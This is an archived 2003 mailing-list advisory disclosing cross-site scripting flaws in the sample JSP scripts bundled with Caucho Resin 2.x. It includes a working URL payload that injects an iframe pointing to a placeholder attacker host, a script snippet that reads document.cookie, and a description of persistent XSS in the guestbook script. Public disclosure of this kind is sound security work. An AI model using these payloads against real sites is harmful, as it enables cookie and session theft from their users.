[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <Law11-OE49U0AOCh8qK0000685a@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Caucho Resin 2.x - Cross Site Scripting
-----------------------------------------------------------------
- EXPL-A-2003-026 exploitlabs.com Advisory 026 -
-----------------------------------------------------------------
-= Caucho Resin =-
Donnie Werner
Oct 18, 2003
Vunerability(s):
----------------
1. XSS
note: this is not
http://www.securiteam.com/securitynews/5KP0O1F7FM.html
http://www.securitytracker.com/alerts/2002/Jun/1004552.html
Product:
--------
Caucho Resin Httpd 2.x
Reviews:
--------
http://www.caucho.com/sales/customers.xtp
Description of product:
-----------------------
"Resin? is a cutting-edge XML Application Server.
It serves the fastest servlets and JSP."
VUNERABILITY / EXPLOIT
======================
default port 8080 ( others used )
affected scripts:
env.jsp
form.jsp
session.jsp
tictactoe.jsp
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
IPT>
the above is only an example, all cookie and session
stealing Cross Site Scripting was possible.
guestbook.jsp allows persistant XSS
enter evil javascript in "name" and "comment" fields
it is then re-rendered upon revisit
Local:
------
nay
Remote:
-------
yeh
Vendor Fix:
-----------
Versions 3.x dont have the examples included
Vendor Contact:
---------------
bugs@...cho.com
Concurrent with this advisory
Credits:
--------
Donnie Werner
CTO E2 Labs
http://e2-labs.cpm
morning_wood@...labs.com
http://nothackers.org
Powered by blists - more mailing lists